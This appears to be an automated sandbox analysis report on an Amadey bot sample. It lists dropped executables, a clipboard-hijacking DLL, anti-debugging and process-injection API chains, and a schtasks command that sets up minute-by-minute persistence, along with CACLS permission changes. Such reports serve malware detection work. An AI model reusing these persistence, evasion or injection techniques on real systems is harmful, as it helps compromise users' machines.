Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll, Main
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cacls.exe CACLS "mnolyk.exe" /P "user:N"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cacls.exe CACLS "mnolyk.exe" /P "user:R" /E
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cacls.exe CACLS "..\4b9a106e76" /P "user:N"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cacls.exe CACLS "..\4b9a106e76" /P "user:R" /E

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00071F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bKug.exe	Code function: 1_2_01081F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Temp\IXP000.TMP

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe

Code function: 2_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,

Source: unknown

Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4968:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2332:120:WilError_01
Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe	Mutant created: \Sessions\1\BaseNamedObjects\c1ec479e5342a25940592acf24703eb2

Source: C:\Users\user\Desktop\file.exe	Command line argument: Kernel32.dll
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bKug.exe	Command line argument: Kernel32.dll
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Command line argument: 08A

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: file.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source: file.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: wextract.pdb source: file.exe, bKug.exe.0.dr
Source:	Binary string: D:\Mktmp\Amadey\Release\Amadey.pdb source: file.exe, 00000000.00000003.299202495.0000000004AE7000.00000004.00000020.00020000.00000000.sdmp, xriv.exe, 00000006.00000000.363577848.00000000008EE000.00000002.00000001.01000000.00000009.sdmp, xriv.exe, 00000006.00000002.365370648.00000000008EE000.00000002.00000001.01000000.00000009.sdmp, mnolyk.exe, 00000007.00000002.822994493.0000000000AFE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 00000007.00000000.365129064.0000000000AFE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 00000012.00000002.375077518.0000000000AFE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 00000012.00000000.370020877.0000000000AFE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 00000019.00000002.494152388.0000000000AFE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 00000019.00000000.493611540.0000000000AFE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 0000001B.00000000.619977727.0000000000AFE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 0000001B.00000002.620319914.0000000000AFE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 0000001D.00000000.748590651.0000000000AFE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 0000001D.00000002.755553344.0000000000AFE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe.6.dr, xriv.exe.0.dr
Source:	Binary string: Healer.pdb source: aKuf.exe, 00000002.00000002.338408809.0000000002390000.00000004.08000000.00040000.00000000.sdmp, aKuf.exe, 00000002.00000002.338220630.00000000008C0000.00000004.08000000.00040000.00000000.sdmp, aKuf.exe, 00000002.00000002.338462611.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, aKuf.exe, 00000002.00000002.338356597.0000000002280000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wextract.pdbGCTL source: file.exe, bKug.exe.0.dr
Source:	Binary string: =cC:\mologoz-wavilowive.pdb source: bKug.exe, 00000001.00000003.299884970.0000000004A4A000.00000004.00000020.00020000.00000000.sdmp, aKuf.exe, 00000002.00000000.300060819.0000000000401000.00000020.00000001.01000000.00000005.sdmp, aKuf.exe.1.dr
Source:	Binary string: C:\Users\Admin\source\repos\Healer\Healer\obj\Release\Healer.pdb source: bKug.exe, 00000001.00000003.299884970.0000000004A87000.00000004.00000020.00020000.00000000.sdmp, nika.exe, 00000004.00000000.339039470.00000000004E2000.00000002.00000001.01000000.00000008.sdmp, nika.exe.1.dr
Source:	Binary string: _.pdb source: aKuf.exe, 00000002.00000002.338220630.00000000008C0000.00000004.08000000.00040000.00000000.sdmp, aKuf.exe, 00000002.00000002.338462611.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, aKuf.exe, 00000002.00000002.338356597.0000000002280000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\Mktmp\Amadey\ClipperDLL\Release\CLIPPERDLL.pdb source: mnolyk.exe, 00000007.00000002.823055961.0000000000E4C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000002.823015828.000000006E7CF000.00000002.00000001.01000000.0000000C.sdmp, clip64.dll.7.dr, clip64[1].dll.7.dr
Source:	Binary string: Healer.pdbH5 source: aKuf.exe, 00000002.00000002.338408809.0000000002390000.00000004.08000000.00040000.00000000.sdmp, aKuf.exe, 00000002.00000002.338220630.00000000008C0000.00000004.08000000.00040000.00000000.sdmp, aKuf.exe, 00000002.00000002.338462611.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, aKuf.exe, 00000002.00000002.338356597.0000000002280000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\mologoz-wavilowive.pdb source: bKug.exe, 00000001.00000003.299884970.0000000004A4A000.00000004.00000020.00020000.00000000.sdmp, aKuf.exe, 00000002.00000000.300060819.0000000000401000.00000020.00000001.01000000.00000005.sdmp, aKuf.exe.1.dr

Data Obfuscation

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe

Unpacked PE file: 2.2.aKuf.exe.400000.0.unpack

Detected unpacking (changes PE section rights)

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe

Unpacked PE file: 2.2.aKuf.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0007724D push ecx; ret
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bKug.exe	Code function: 1_2_0108724D push ecx; ret
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Code function: 2_2_0041C40C push cs; iretd
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Code function: 2_2_00423149 push eax; ret
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Code function: 2_2_0041C50E push cs; iretd
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Code function: 2_2_004231C8 push eax; ret
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Code function: 2_2_0040E21D push ecx; ret
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Code function: 2_2_0041C6BE push ebx; ret
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Code function: 2_2_0059C125 push ebx; ret
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Code function: 2_2_0058E484 push ecx; ret
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Code function: 2_2_0059BE73 push cs; iretd
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Code function: 2_2_0059BF75 push cs; iretd
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Code function: 2_2_02134139 push edi; iretd
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Code function: 2_2_0213454E push ecx; retf
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe	Code function: 6_2_008CF748 push E8FFFFFBh; iretd
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe	Code function: 6_2_008D7D26 push ecx; ret

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00072F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,

Source: nika.exe.1.dr

Static PE information: 0xE382D401 [Fri Dec 15 06:19:45 2090 UTC]

Persistence and Installation Behavior

Yara detected Amadey bot

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 00000007.00000002.823055961.0000000000E4C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.823055961.0000000000E2B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.823055961.0000000000E0C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.823055961.0000000000DBA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: mnolyk.exe PID: 2328, type: MEMORYSTR

Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bKug.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe	File created: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\clip64[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe	File created: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bKug.exe	File created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bKug.exe	File created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe	Jump to dropped file

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00071AE8 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bKug.exe	Code function: 1_2_01081AE8 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mnolyk.exe /TR "C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe" /F

Creates an undocumented autostart registry key

Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Key value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\cacls.exe CACLS "mnolyk.exe" /P "user:N"

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe TID: 4636	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe TID: 1244	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe TID: 5288	Thread sleep count: 65 > 30
Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe TID: 5288	Thread sleep time: -1950000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe TID: 4392	Thread sleep time: -50000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe TID: 4776	Thread sleep count: 51 > 30
Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe TID: 4776	Thread sleep time: -9180000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe TID: 4644	Thread sleep count: 47 > 30
Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe TID: 5288	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\SysWOW64\rundll32.exe TID: 5068	Thread sleep count: 193 > 30
Source: C:\Windows\SysWOW64\rundll32.exe TID: 5068	Thread sleep time: -193000s >= -30000s

Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe	Thread delayed: delay time: 180000

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bKug.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Users\user\Desktop\file.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe

API coverage: 6.0 %

Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\clip64[1].dll

Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe	Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe	Thread delayed: delay time: 50000
Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe	Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe	Thread delayed: delay time: 30000

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe

API call chain: ExitProcess graph end node

Source: mnolyk.exe, 00000007.00000002.823055961.0000000000E4C000.00000004.00000020.00020000.00000000.sdmp, mnolyk.exe, 00000007.00000002.823055961.0000000000E2B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: mnolyk.exe, 00000007.00000002.823055961.0000000000E0C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWh

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe

Process information queried: ProcessInformation

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00075467 GetSystemInfo,CreateDirectoryA,RemoveDirectoryA,

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00072390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bKug.exe	Code function: 1_2_01082390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe	Code function: 6_2_008DFC58 FindFirstFileExW,

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00072F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Code function: 2_2_0058092B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Code function: 2_2_00580D90 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe	Code function: 6_2_008DA9A1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe	Code function: 6_2_008DCFB2 mov eax, dword ptr fs:[00000030h]

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe

Code function: 2_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe

Code function: 2_2_0040ADB0 GetProcessHeap,HeapFree,

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe	Process token adjusted: Debug

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe

Memory allocated: page read and write | page guard

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00076F40 SetUnhandledExceptionFilter,
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00076CF0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bKug.exe	Code function: 1_2_01086F40 SetUnhandledExceptionFilter,
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bKug.exe	Code function: 1_2_01086CF0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Code function: 2_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Code function: 2_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Code function: 2_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Code function: 2_2_004123F1 SetUnhandledExceptionFilter,
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Code function: 2_2_0058D070 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Code function: 2_2_0058E883 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Code function: 2_2_005971D1 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe	Code function: 2_2_00592658 SetUnhandledExceptionFilter,
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe	Code function: 6_2_008D7A74 SetUnhandledExceptionFilter,
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe	Code function: 6_2_008D7208 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe	Code function: 6_2_008D790F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe	Code function: 6_2_008DBB20 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

HIPS / PFW / Operating System Protection Evasion

Contains functionality to inject code into remote processes

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe

Code function: 6_2_008C38C0 GetModuleFileNameA,CreateProcessA,VirtualAlloc,GetThreadContext,ReadProcessMemory,GetModuleHandleA,GetProcAddress,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree,VirtualFree,

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe	Process created: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe "C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe"
Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mnolyk.exe /TR "C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe" /F
